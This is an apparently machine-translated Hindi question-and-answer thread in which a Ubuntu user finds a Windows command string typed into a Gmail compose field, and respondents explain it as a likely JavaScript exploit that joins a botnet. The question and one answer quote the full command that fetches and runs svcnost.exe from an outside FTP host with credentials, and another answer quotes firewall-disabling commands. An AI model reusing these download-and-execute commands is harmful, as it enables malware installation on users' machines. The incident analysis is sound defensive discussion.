सवाल कैसे पहचानें कि मेरा लिनक्स कंप्यूटर हैक किया गया था या नहीं?


मेरा घर पीसी आमतौर पर चालू है, लेकिन मॉनीटर बंद है। इस शाम मैं काम से घर आया और पाया कि एक हैक प्रयास की तरह क्या दिखता है: मेरे ब्राउज़र में, मेरा जीमेल खुला था (वह मुझे था), लेकिन यह निम्नलिखित में कंपोज़ मोड में था TO खेत:

md / c echo खुला cCTeamFtp.yi.org 21 >> ik और echo उपयोगकर्ता ccteam10 765824 >> ik और echo बाइनरी >> ik और echo svcnost.exe प्राप्त करें >> ik और echo bye >> ik & ftp -n -v -s: ik & del ik और svcnost.exe और बाहर निकलें   गूंज आप स्वामित्व में मिला है

यह मुझे विंडोज कमांड लाइन कोड की तरह दिखता है, और md इस तथ्य के साथ संयुक्त कोड की शुरूआत कि जीमेल रचना मोड में था, यह स्पष्ट करता है कि किसी ने दौड़ने की कोशिश की cmd आदेश। मुझे लगता है कि मैं भाग्यशाली था कि मैं वास्तव में इस पीसी पर विंडोज नहीं चलाता, लेकिन मेरे पास अन्य लोग हैं जो करते हैं। यह पहली बार है कि ऐसा कुछ मेरे साथ हुआ है। मैं एक लिनक्स गुरु नहीं हूं, और मैं उस समय फ़ायरफ़ॉक्स के अलावा किसी भी अन्य कार्यक्रम नहीं चला रहा था।

मुझे पूरा यकीन है कि मैंने यह नहीं लिखा था, और मेरे कंप्यूटर पर कोई और शारीरिक रूप से नहीं था। साथ ही, मैंने हाल ही में अपना Google पासवर्ड (और मेरे सभी अन्य पासवर्ड) को कुछ ऐसा बदल दिया है vMA8ogd7bv इसलिए मुझे नहीं लगता कि किसी ने मेरा Google खाता हैक किया है।

अभी क्या हुआ? किसी ने मेरे कंप्यूटर पर कीस्ट्रोक क्यों लगाया जब यह नानी की पुरानी विंडोज मशीन नहीं है जो वर्षों से मैलवेयर चला रही है, लेकिन हाल ही में एक नया उबंटू इंस्टॉल है?

अद्यतन करें:
मुझे कुछ बिंदुओं और प्रश्नों को संबोधित करने दें:

  • मैं ऑस्ट्रिया में ग्रामीण इलाकों में हूं। मेरा डब्ल्यूएलएएन राउटर चलता है WPA2/पीएसके और एक मध्यम-मजबूत पासवर्ड जो शब्दकोश में नहीं है; यहां से क्रूर बल और 50 मीटर से भी कम होना होगा; यह संभावना नहीं है कि यह हैक हो गया।
  • मैं एक यूएसबी वायर्ड कीबोर्ड का उपयोग कर रहा हूं, इसलिए फिर से यह बहुत ही असंभव है कि कोई भी इसे हैक करने के लिए सीमा के भीतर हो सकता है।
  • मैं उस समय अपने कंप्यूटर का उपयोग नहीं कर रहा था; जब मैं काम पर था तो यह घर पर बस बेकार था। यह एक मॉनीटर-माउंटेड नेटटॉप पीसी है, इसलिए मैं इसे शायद ही कभी बंद कर देता हूं।
  • मशीन केवल दो महीने पुरानी है, केवल उबंटू चलाती है, और मैं अजीब सॉफ्टवेयर का उपयोग नहीं कर रहा हूं या अजीब साइटों पर जा रहा हूं। यह मुख्य रूप से स्टैक एक्सचेंज, जीमेल, और समाचार पत्र है। खेलना बंद। उबंटू खुद को अद्यतित रखने के लिए तैयार है।
  • मुझे चल रहे किसी भी वीएनसी सेवा से अवगत नहीं है; मैंने निश्चित रूप से एक स्थापित या सक्षम नहीं किया है। मैंने कोई अन्य सर्वर भी शुरू नहीं किया है। मुझे यकीन है कि अगर कोई उबंटू में डिफ़ॉल्ट रूप से चल रहा है?
  • मैं जीमेल की खाता गतिविधि में सभी आईपी पते जानता हूं। मुझे पूरा यकीन है कि Google प्रवेश द्वार नहीं था।
  • मुझे एक मिला लॉग फ़ाइल व्यूअर, लेकिन मुझे नहीं पता कि क्या देखना है। मदद?

मैं वास्तव में क्या जानना चाहता हूं, और वास्तव में मुझे असुरक्षित महसूस करता है, है: इंटरनेट से कोई भी मेरी मशीन पर कीस्ट्रोक कैसे उत्पन्न कर सकता है? मैं इसके बारे में सभी tinfoil-hat होने के बिना इसे कैसे रोक सकता हूं? मैं एक लिनक्स गीक नहीं हूं, मैं एक पिता हूं जो 20+ सालों से विंडोज के साथ गड़बड़ कर रहा है और इससे थक गया हूं। और ऑनलाइन होने के सभी 18+ वर्षों में, मैंने कभी भी किसी भी हैक प्रयास को व्यक्तिगत रूप से नहीं देखा है, इसलिए यह मेरे लिए नया है।


126
2018-04-20 18:24


मूल


क्या किसी और के पास आपके कंप्यूटर तक पहुंच है, या आपके पास बहुत पुराना वायरलेस कीबोर्ड है? इसके अलावा, उबंटू में एक अंतर्निहित वीएनसी सर्वर है। यदि यह सक्रिय है, तो कहीं यादृच्छिक स्क्रिप्ट कनेक्ट हो सकती है और माना जाता है कि यह एक विंडोज कंप्यूटर था, कुंजीस्ट्रोक WIN + R, cmd भेज रहा था ...... - TuxRug
@torbengb: आपकी पोस्ट वास्तव में मुझे डराते हो... - Mehrdad
क्या आपके वायरलेस नेटवर्क पर कोई अन्य कंप्यूटर है? अगर घुसपैठ तोड़ दिया जो अपने सुरक्षा यह उसे आपके स्थानीय नेटवर्क में "इन" देगी, जिससे उबंटू बॉक्स को विभिन्न तरीकों से क्रैक करना पड़ सकता है। - CarlF
@ म्यूनू ... और 'मुझे यकीन है कि आपने इसे कहीं भी नहीं लिखा है और किसी भी ऐप का प्रबंधन करने के लिए इसका उपयोग नहीं किया है, है ना? आइए पासवर्ड-बाशिंग शुरू न करें; कम से कम मेरा पासवर्ड नहीं है password :-) - Torben Gundtofte-Bruun
क्या आप के पास एक बिल्ली है? - Zaki


जवाब:


मुझे संदेह है कि आपको चिंता करने के लिए कुछ भी है। यह एक जावास्क्रिप्ट हमले की संभावना से अधिक था जिसने एक करने की कोशिश की डाउनलोड करके ड्राइव करें। यदि आप इस बारे में चिंतित हैं तो इसका उपयोग शुरू हो रहा है NoScript तथा ऐडब्लॉक प्लस फ़ायरफ़ॉक्स एड-ऑन।

भरोसेमंद साइटों पर भी जाकर आप सुरक्षित नहीं हैं क्योंकि वे तृतीय-पक्ष विज्ञापनदाताओं से जावास्क्रिप्ट कोड चलाते हैं जो दुर्भावनापूर्ण हो सकते हैं।

मैंने इसे पकड़ लिया और इसे एक वीएम में चलाया। यह mirc स्थापित है और यह स्थिति लॉग है ... http://pastebin.com/Mn85akMk

यह एक स्वचालित हमला है जो आपको एमआईआरसी डाउनलोड करने और एक बॉटनेट में शामिल होने की कोशिश कर रहा है जो आपको स्पैमबॉट में बदल देगा ... इसमें मेरा वीएम शामिल था और कई अलग-अलग रिमोट पते से कनेक्शन बना रहा था, जिसमें से एक है autoemail-119.west320.com

विंडोज 7 में इसे चलाना मुझे यूएसी प्रॉम्प्ट को स्वीकार करना था और इसे फ़ायरवॉल के माध्यम से एक्सेस करने की अनुमति थी।

अन्य मंचों पर इस सटीक कमांड की कई रिपोर्टें प्रतीत होती हैं, और कोई भी कहता है कि एक धार फ़ाइल ने इसे डाउनलोड करने के दौरान इसे निष्पादित करने का प्रयास किया ... मुझे यकीन नहीं है कि यह कैसे संभव होगा।

मैंने इसे स्वयं नहीं उपयोग किया है, लेकिन यह आपको वर्तमान नेटवर्क कनेक्शन दिखाने में सक्षम होना चाहिए ताकि आप देख सकें कि आप मानक से कुछ से जुड़े हुए हैं या नहीं: http://netactview.sourceforge.net/download.html


66
2018-04-20 18:41



एर, सभी टिप्पणियां क्यों थीं (और भी अत्यधिक अत्यधिक प्रासंगिक जिन लोगों ने पाया कि लिपि ने एक खोलने का प्रयास किया था cmd खिड़की) हटाए गए !? - BlueRaja - Danny Pflughoeft
अगर मैं अभी यूब्लॉक उत्पत्ति का उपयोग शुरू कर दूं तो क्या मैं इस तरह के हमले से सुरक्षित रहूंगा? - RobotUnderscore


मैं सहमत हूं @ jb48394 कि यह शायद एक जावास्क्रिप्ट शोषण है, इन दिनों सबकुछ की तरह।

तथ्य यह है कि उसने एक खोलने की कोशिश की cmd खिड़की (देख @ torbengb की टिप्पणी) और पृष्ठभूमि में बुद्धिमानी से ट्रोजन डाउनलोड करने के बजाए एक दुर्भावनापूर्ण आदेश चलाएं, यह बताता है कि यह फ़ायरफ़ॉक्स में कुछ भेद्यता का शोषण करता है जो इसे कुंजी-स्ट्रोक में प्रवेश करने की अनुमति देता है, लेकिन कोड नहीं चलाता है।

यह भी बताता है कि यह शोषण क्यों किया गया था स्पष्ट रूप से विशेष रूप से विंडोज के लिए लिखा गया है, लिनक्स में भी काम करेगा: फ़ायरफ़ॉक्स सभी ओएस में जावास्क्रिप्ट को उसी तरह से चलाता है  (कम से कम, यह करने की कोशिश करता है :))। यदि यह विंडोज के लिए बफर ओवरफ्लो या इसी तरह के शोषण के कारण हुआ था, तो यह सिर्फ प्रोग्राम को दुर्घटनाग्रस्त कर देता।

जहां जावास्क्रिप्ट कोड आया था - शायद एक दुर्भावनापूर्ण Google विज्ञापन (पूरे दिन जीमेल में विज्ञापन चक्र)। यह नहीं होगा  होना    प्रथम  पहर


41
2018-04-20 21:52



अच्छा संदर्भ। - kizzx2
स्किमर्स के लिए एफवाईआई, कि आखिरी "लिंक" वास्तव में पांच अलग-अलग लिंक हैं। - Pops
यह बहुत चौंकाने वाला होगा अगर यह वास्तव में एक जावास्क्रिप्ट शोषण है क्योंकि मेरा फ़ायरफ़ॉक्स आमतौर पर दिनों के लिए खोला रहता है। हालांकि, आपको विंडोज के तहत किसी अन्य सिस्टम को कुंजी भेजने के लिए विशेष एपीआई और शायद लिनक्स के तहत एक अलग सिस्टम कॉल (यदि मौजूद है) को कॉल करने की आवश्यकता है। चूंकि कीस्ट्रोक भेजने से सामान्य जावास्क्रिप्ट ऑपरेशन नहीं होता है, मुझे संदेह है कि फ़ायरफ़ॉक्स उस के लिए क्रॉस-प्लेटफ़ॉर्म कॉल लागू करेगा। - billc.cn
@ बिलसीसीएन: मुझे लगता है कि पीएस / 2 कीबोर्ड बफर को लिखना ऑपरेटिंग सिस्टम के बावजूद वही काम करता है। - BlueRaja - Danny Pflughoeft


मुझे मिला एक समान हमला एक और लिनक्स मशीन पर। ऐसा लगता है कि यह विंडोज के लिए कुछ प्रकार का एफ़टीपी कमांड है।


12
2018-04-20 18:36



अधिक सटीक, यह फ़ाइल डाउनलोड और चलाता है ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exe विंडोज का उपयोग कर ftp कमांड लाइन उपकरण। - grawity
इसे पेस्टबिन पर भी मिला pastebin.com/FXwRpKH4 - Shekhar
यहां साइट के बारे में जानकारी है whois.domaintools.com/216.210.179.67 - Shekhar
यह एक WinRAR SFX पैकेज है जिसमें पोर्टेबल एमआईआरसी इंस्टॉल है और "DriverUpdate.exe" नामक एक फ़ाइल है। DriverUpdate.exe निष्पादित करता है (कम से कम) दो खोल आदेश: नेटस् फ़ायरवॉल सेट opmode अक्षम तथा टास्ककिल / एफ / आईएम वीसीएसपीएडब्ल्यूएनएक्सई / टी यह जोड़ने के लिए भी प्रयास करता है (मुझे लगता है) die-freesms-seite.com इंटरनेट एक्सप्लोरर विश्वसनीय क्षेत्र और प्रॉक्सी बाईपास के लिए। - Andrew Lambert


यह आपके पूरे प्रश्न का उत्तर नहीं देता है, लेकिन लॉग फ़ाइल में विफल लॉगऑन प्रयासों की तलाश है।

अगर आपके लॉग में लगभग पांच विफल प्रयास हैं, तो किसी ने क्रैक करने की कोशिश की root। यदि लॉगऑन करने का एक सफल प्रयास है root जबकि आप अपने कंप्यूटर से दूर थे, तुरंत अपने पासवर्ड बदलें !! मेरा मतलब अभी सही है! अधिमानतः कुछ अल्फान्यूमेरिक, और लगभग 10 वर्ण लंबा।

आपके द्वारा प्राप्त संदेशों के साथ (द echoआदेश) यह वास्तव में कुछ अपरिपक्व की तरह लगता है स्क्रिप्ट किडडी। अगर यह एक असली हैकर था जो जानता था कि वह क्या कर रहा था, तो शायद आपको इसके बारे में अभी भी पता नहीं चलेगा।


5
2018-04-21 04:13



मैं मानता हूं कि यह स्पष्ट रूप से बहुत शौकिया था। कम से कम उन्हें नहीं रखा जाना चाहिए था echo आप स्वामित्व में है अतं मै। मुझे आश्चर्य है कि अगर कोई "असली हैकर्स" कभी मिल गया है? या वास्तव में मैं शायद पूछ रहा हूँ, कितने? - Torben Gundtofte-Bruun
@torgengb: अगर आदेश विंडोज कमांड प्रॉम्प्ट में चलाया गया था, तो आपको गूंज नहीं दिखाई देगी (क्योंकि &exit) - BlueRaja - Danny Pflughoeft


whois रिपोर्ट West320.com माइक्रोसॉफ्ट के स्वामित्व में है।

UPnP तथा सस्ता शराब (सिस्टम -> प्राथमिकताएं -> रिमोट डेस्कटॉप) एक कमजोर उबंटू पासवर्ड के साथ संयुक्त?

क्या आपने किसी गैर-मानक भंडार का उपयोग किया था?

डेफ कान प्रत्येक वर्ष एक वाई-फाई प्रतियोगिता है कि वाई-फाई एक्सेस पॉइंट कितनी दूर तक पहुंचा जा सकता है - आखिरी मैंने सुना कि यह 250 मील था।

यदि आप वास्तव में डरना चाहते हैं, तो ए के कमांड-एन-कंट्रोल सेंटर के स्क्रीनशॉट देखें ज़ीउस बोनेट। कोई मशीन सुरक्षित नहीं है, लेकिन लिनक्स पर फ़ायरफ़ॉक्स बाकी की तुलना में सुरक्षित है। यदि आप दौड़ते हैं तो भी बेहतर SELinux


-1
2018-04-20 21:59



इस शोषण के लेखक को स्पष्ट रूप से लिनक्स पर इसे चलाने का कोई इरादा नहीं था, इसलिए मुझे संदेह है कि कमजोर gnome उपयोगिता या कमजोर पासवर्ड के साथ इसका कोई संबंध नहीं था (भी, ओपी पहले से ही उल्लेख किया है कि उसके पास एक सुरक्षित पासवर्ड है) - BlueRaja - Danny Pflughoeft
दरअसल, वह उबंटू पासवर्ड रखने का जिक्र नहीं करता है, सिर्फ एक जीमेल और वायरलेस पासफ्रेज। मेटाप्लोइट चलाने वाले बच्चे को लिनक्स के बारे में भी पता नहीं हो सकता है, वह सिर्फ वीएनसी देखता है। यह एक जावास्क्रिप्ट हमले की संभावना है। - rjt